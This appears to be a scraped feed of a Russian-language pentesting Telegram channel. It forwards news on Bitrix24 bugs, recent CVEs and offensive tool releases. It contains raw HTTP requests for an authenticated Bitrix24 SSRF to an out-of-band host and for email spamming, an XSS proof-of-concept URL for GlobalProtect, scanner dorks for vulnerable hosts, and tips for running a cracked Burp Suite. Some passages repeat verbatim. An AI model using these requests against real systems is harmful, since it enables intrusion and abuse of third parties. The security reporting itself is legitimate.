Forwarded from Заметки склерозного вебера (ArroizX)
Решил сделать последний в этом году пост про наш любимый битрикс:
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
В Битрикс24 существует возможность интеграции с MS Sharepoint для синхронизации различных списков: клиенты, календарь и пр. Подробнее про это можете прочитать ТУТ.
Нас же интересует здесь то, что мы можем использовать данную функциональность для SSRF-атак, главное - это иметь любую валидную учётку:
Возможно данная функциональность может встретиться и в обычном битриксе, но это я оставляю на проверку вам:D
Неавторизированный спам электронными письмами через sender_sub_confirm.php
Можно захламить любой почтовый ящик письмами о подтверждении подписки, причём для этого не нужно иметь УЗ битрикс:
На ББ вряд-ли примут, но как бага для проекта - самое то.
P.S. @FaLLenSkiLL если ты будешь добавлять это в свой Bitrix Ultimate Pentest Guide, докинь пж SSRF через
Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint
В Битрикс24 существует возможность интеграции с MS Sharepoint для синхронизации различных списков: клиенты, календарь и пр. Подробнее про это можете прочитать ТУТ.
Нас же интересует здесь то, что мы можем использовать данную функциональность для SSRF-атак, главное - это иметь любую валидную учётку:
GET /bitrix/components/bitrix/sharepoint.link/ajax.php?mode=test&sp_server=http://collaborator&sp_user=&sp_pass=&sessid=... HTTP/1.1
Host: bitrix24
Cookie: ...
Bx-Ajax: true
Возможно данная функциональность может встретиться и в обычном битриксе, но это я оставляю на проверку вам:D
Неавторизированный спам электронными письмами через sender_sub_confirm.php
Можно захламить любой почтовый ящик письмами о подтверждении подписки, причём для этого не нужно иметь УЗ битрикс:
POST /bitrix/tools/sender_sub_confirm.php HTTP/1.1
Host: bitrix
Cookie: ...
Content-Type: application/x-www-form-urlencoded
Content-Length: x
sessid=...&sender_subscription=add&SENDER_SUBSCRIBE_EMAIL=some@some.com
На ББ вряд-ли примут, но как бага для проекта - самое то.
P.S. @FaLLenSkiLL если ты будешь добавлять это в свой Bitrix Ultimate Pentest Guide, докинь пж SSRF через
/bitrix/components/bitrix/main.urlpreview/ajax.php и /bitrix/tools/html_editor_action.php, а то лень каждый раз ползти в PDFку отдельно и копировать запрос=)Forwarded from 1N73LL1G3NC3
CVE-2025-37164: Unauthenticated RCE in HPE OneView.
Unauthenticated RCE (10.0 CVSS) vulnerability, in Hewlett Packard Enterprise (HPE) OneView via an unauthenticated REST endpoint called executeCommand. All versions below 11.00 are vulnerable (so long as the vendor supplied hotfix has not been applied), however some VM product versions do not enable the vulnerable "ID Pools" endpoint, and are not exploitable.
Blog: https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis
ZoomEye Dork: app="HPE OneView"
Unauthenticated RCE (10.0 CVSS) vulnerability, in Hewlett Packard Enterprise (HPE) OneView via an unauthenticated REST endpoint called executeCommand. All versions below 11.00 are vulnerable (so long as the vendor supplied hotfix has not been applied), however some VM product versions do not enable the vulnerable "ID Pools" endpoint, and are not exploitable.
Blog: https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis
ZoomEye Dork: app="HPE OneView"
P.S. When testing HPE OneView version 6.60, you can elevate to root by exploiting CVE-2021-4034. It's unknown if that will work against more recent OneView appliance versions.
👍1
А вы замечали, что при установке
Так вот, если нажать на кнопку и скачать официальную версию с сайта portswigger, а затем заменить её на текущую, то вы поставите новый бурп.
Наверное, поэтому сейчас так редко выходят новости о новой версии бурпа — лоадер позволяет на лету их обновлять. Всё, что останется сделать — скопировать команду из поля Loader command, сохранить её в файл, дать ей
chmod +x <command>
и скинуть её куда-нибудь в PATH (к примеру, в /bin).
Работает как при свежей установке бурпа, так и при его обновлении!
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯5😁2
Forwarded from Freedom Fox 🏴☠
This media is not supported in your browser
VIEW IN TELEGRAM
#0Day утечка Net‑NTLMv2 хеша через Microsoft Photos (ms-photos URI) в один клик. Microsoft Photos принимает параметр
https://github.com/rubenformation/ms-photos_NTLM_Leak
Видео: https://youtu.be/e-lM_vP6HwQ?si=-_vwV3Dzt88PQXG3
Telegram✉️ @freedomfox
fileName=\\UNC\path в URI-схеме ms-photos:. Microsoft баг не признала, CVE нет.https://github.com/rubenformation/ms-photos_NTLM_Leak
Видео: https://youtu.be/e-lM_vP6HwQ?si=-_vwV3Dzt88PQXG3
Telegram
Please open Telegram to view this post
VIEW IN TELEGRAM
(обновлений не было 9 месяцев)
🔗 Ссылка — скоро раскатают на pipx и kali-репозитории
Самые приятные изменения:
💠 Новый модуль для смены пароля пользователю💠 Модуль enable_cmdshell для mssql💠 Возможность дампа LSA/SAM через MSSQL💠 Долгожданный фикс проблемы парсинга кириллицы в LDAP (теперь доступен глобально без необходимости устанавливать форк)💠 Новый модуль - eventlog_creds, позволяющий искать учетки в event log'е (при наличии process creation auditing)💠 Новый модуль Badsuccessor💠 Теперь по умолчанию доступен коллектор Bloodhound Community Edition (сменить его обратно на legacy можно в конфиге)💠 Новый модуль - AWS Credentials Finder💠 Атаку Kerberoasting теперь возможно выполнять по отношению к учётным записям с включенным pre-authentication💠 В модуль lsassy завезли поддержку дампа kerberos-билетов💠 Возможность исполнения команд через RDP!!!!💠 Модуль для проверки уязвимости NTLM Reflection (patch-based)💠 Возможность kerberoasting'а определенных пользователей и компьютеров💠 Новый модуль — raisechild для повышения привилегий в cross-forest взаимодействии💠 Множество правок доступных раннее модулей
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Brut Security 2.0
SmuggleX v0.1.0 🚀
⚡️smugglex <TARGET> <FLAGS>
🔆 <TARGETS> | smugglex
🏷️Rust-powered HTTP Request Smuggling Scanner.
⭐️ Github: github.com/hahwul/smugglex
⚡️smugglex <TARGET> <FLAGS>
🔆 <TARGETS> | smugglex
🏷️Rust-powered HTTP Request Smuggling Scanner.
⭐️ Github: github.com/hahwul/smugglex
👍2
Forwarded from Brut Security 2.0
MongoBleed (CVE-2025-14847) - Unauthenticated Memory Leak PoC
https://github.com/joe-desimone/mongobleed
By @dez
#bugbountytips #bugbounty #cybersecurity
https://github.com/joe-desimone/mongobleed
By @dez
#bugbountytips #bugbounty #cybersecurity
🔥3
С наступающим Новым Годом!
Жду эксплоит на landingпод елкой в л/с канала!
🐸 🐸 🐸
Жду эксплоит на landing
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯2❤1
Давайте проведём небольшой интерактив в сообщениях канала — посоветуйте, пожалуйста, ноутбук по критериям: 32 GB оперативки, 1 TB SSD, нормальная поддержка виртуалок и приемлемый вес.
Из дополнительных (но не обязательных) желаний: наличие RJ45.
Самое важное:
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecuriXy.kz
🔒 CVE‑2025‑0133 - Reflected XSS в Palo Alto GlobalProtect
🌍 Затрагивает GlobalProtect Gateway, Portal и Captive Portal
⚠️ Риск:
Выполнение JS в браузере пользователя → угон сессий, кража auth‑cookie, фишинг и другие клиентские атаки.
🧩 Суть уязвимости:
Reflected XSS в обработке параметров
Уязвимость затрагивает PAN‑OS 10.2 / 11.1 / 11.2 до последних патчей.
XML/SVG‑неймспейсы могут обходить стандартные HTML‑фильтры - это ключевой момент для проверки.
🛠 Что проверить инженерам:
Обработку нестандартных атрибутов, namespace‑based конструкций и вложенных тегов.
Логи обращений к
CSP, фильтрацию и поведение периметра при передаче нестандартных параметров.
Конфигурацию Captive Portal, особенно если используется для внешних пользователей.
🛡 Рекомендации администраторам: Установить обновления PAN‑OS:
◦ 11.2 → 11.2.7
◦ 11.1 → 11.1.11
◦ 10.2 → 10.2.17
Ограничить доступ к порталу (IP allowlist, GeoIP, VPN‑only access).
Включить мониторинг аномальных запросов к GlobalProtect.
Перепроверить настройки Clientless VPN, учитывая связанные риски (PAN‑SA‑2025‑0005).
PoC:
🌍 Затрагивает GlobalProtect Gateway, Portal и Captive Portal
⚠️ Риск:
Выполнение JS в браузере пользователя → угон сессий, кража auth‑cookie, фишинг и другие клиентские атаки.
🧩 Суть уязвимости:
Reflected XSS в обработке параметров
getconfig.esp. Триггер возможен при переходе по специально сформированной ссылке.Уязвимость затрагивает PAN‑OS 10.2 / 11.1 / 11.2 до последних патчей.
XML/SVG‑неймспейсы могут обходить стандартные HTML‑фильтры - это ключевой момент для проверки.
🛠 Что проверить инженерам:
Обработку нестандартных атрибутов, namespace‑based конструкций и вложенных тегов.
Логи обращений к
/ssl-vpn/getconfig.esp и связанным endpoint’ам.CSP, фильтрацию и поведение периметра при передаче нестандартных параметров.
Конфигурацию Captive Portal, особенно если используется для внешних пользователей.
🛡 Рекомендации администраторам: Установить обновления PAN‑OS:
◦ 11.2 → 11.2.7
◦ 11.1 → 11.1.11
◦ 10.2 → 10.2.17
Ограничить доступ к порталу (IP allowlist, GeoIP, VPN‑only access).
Включить мониторинг аномальных запросов к GlobalProtect.
Перепроверить настройки Clientless VPN, учитывая связанные риски (PAN‑SA‑2025‑0005).
PoC:
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1–10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
❤1🔥1
Forwarded from 1N73LL1G3NC3
ESC17: Using ADCS to Attack HTTPS-Enabled WSUS Clients
How to leverage misconfigured ADCS templates to gain code execution on HTTPS-enabled WSUS clients.
How to leverage misconfigured ADCS templates to gain code execution on HTTPS-enabled WSUS clients.
Forwarded from cKure
■■■■■ CVE-2026-21858 + CVE-2025-68613: n8n Ni8mare - Full Chain Exploit
Unauthenticated to Root RCE:
- LFI via Content-Type confusion
- Read /proc/self/environ to find HOME
- Steal encryption key + database
- Forge admin JWT token
- Expression injection sandbox bypass
- RCE as root
CVSS 10.0
https://github.com/Chocapikk/CVE-2026-21858
Unauthenticated to Root RCE:
- LFI via Content-Type confusion
- Read /proc/self/environ to find HOME
- Steal encryption key + database
- Forge admin JWT token
- Expression injection sandbox bypass
- RCE as root
CVSS 10.0
https://github.com/Chocapikk/CVE-2026-21858
GitHub
GitHub - Chocapikk/CVE-2026-21858: n8n Ni8mare - Unauthenticated Arbitrary File Read to RCE Chain (CVSS 10.0)
n8n Ni8mare - Unauthenticated Arbitrary File Read to RCE Chain (CVSS 10.0) - Chocapikk/CVE-2026-21858
Forwarded from road to OSCP
#responder #internal
[ Responder 3.2.0.0 ]
Responder 3.2.0.0 is out!
All new year updates +
- IMAP and SMTP StartTLS
- IMAPS TLS server on port 993
- DHCPv6 poisoning (pure python) using _dirkjan
mitm6 attacks
- Kerberos, DNS server updates
- Etc.
https://github.com/lgandx/Responder
[ Responder 3.2.0.0 ]
Responder 3.2.0.0 is out!
All new year updates +
- IMAP and SMTP StartTLS
- IMAPS TLS server on port 993
- DHCPv6 poisoning (pure python) using _dirkjan
mitm6 attacks
- Kerberos, DNS server updates
- Etc.
https://github.com/lgandx/Responder
Forwarded from 1N73LL1G3NC3
CVE-2025-64155: Fortinet FortiSIEM Argument Injection to Remote Code Execution.
An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an unauthenticated attacker to remotely inject arguments, leading to root remote code execution.
Blog: https://horizon3.ai/attack-research/disclosures/cve-2025-64155-three-years-of-remotely-rooting-the-fortinet-fortisiem/
Dork:
An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an unauthenticated attacker to remotely inject arguments, leading to root remote code execution.
Blog: https://horizon3.ai/attack-research/disclosures/cve-2025-64155-three-years-of-remotely-rooting-the-fortinet-fortisiem/
Dork:
ZoomEye: app="Fortinet FortiSIEM"
HUNTER : product.name="Fortinet FortiSIEM"
🔥2
Forwarded from SecuriXy.kz
🔥 Готовы впитать в себя 1.1 квадриллион NTLMv1-хэшей?
Google и Mandiant вывалили 8.6 ТБ предрасчитанных радужных таблиц - 1,122,334,455,667,788 паролей.
💀 NetNTLMv1: конец эпохи
💻 < $600 железа → < 12 часов → ключ в кармане.
🛠️Что нужно? - gsutil, DownThemAll, и много свободного места.
📦
Google и Mandiant вывалили 8.6 ТБ предрасчитанных радужных таблиц - 1,122,334,455,667,788 паролей.
💀 NetNTLMv1: конец эпохи
💻 < $600 железа → < 12 часов → ключ в кармане.
🛠️Что нужно? - gsutil, DownThemAll, и много свободного места.
📦
https://console.cloud.google.com/storage/browser/net-ntlmv1-tables/tables;tab=objects?pageState=("StorageObjectListTable":("f":"%255B%255D"))&pli=1&prefix=&forceOnObjectsSortingFiltering=false🤔2
Forwarded from PT SWARM
This media is not supported in your browser
VIEW IN TELEGRAM
📞 Microsoft fixed an authenticated RCE in Windows Telephony Service (CVE-2026-20931), discovered by our researcher Sergey Bliznyuk.
Read the write-up: https://swarm.ptsecurity.com/whos-on-the-line-exploiting-rce-in-windows-telephony-service/
Read the write-up: https://swarm.ptsecurity.com/whos-on-the-line-exploiting-rce-in-windows-telephony-service/
Forwarded from 1N73LL1G3NC3
Chisel-ng
A Rust implementation of chisel for penetration testing and red team operations. Establishes reverse tunnels over SSH-over-WebSocket-over-TLS, allowing operators to pivot through compromised hosts while blending with normal HTTPS traffic.
A Rust implementation of chisel for penetration testing and red team operations. Establishes reverse tunnels over SSH-over-WebSocket-over-TLS, allowing operators to pivot through compromised hosts while blending with normal HTTPS traffic.
😁3
Pentester's Backlog
Взял себе по итогу:
Lenovo Lecoo Pro 14 2025
AMD Ryzen 7 H 255, RAM 32 ГБ, SSD 1024 ГБ
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6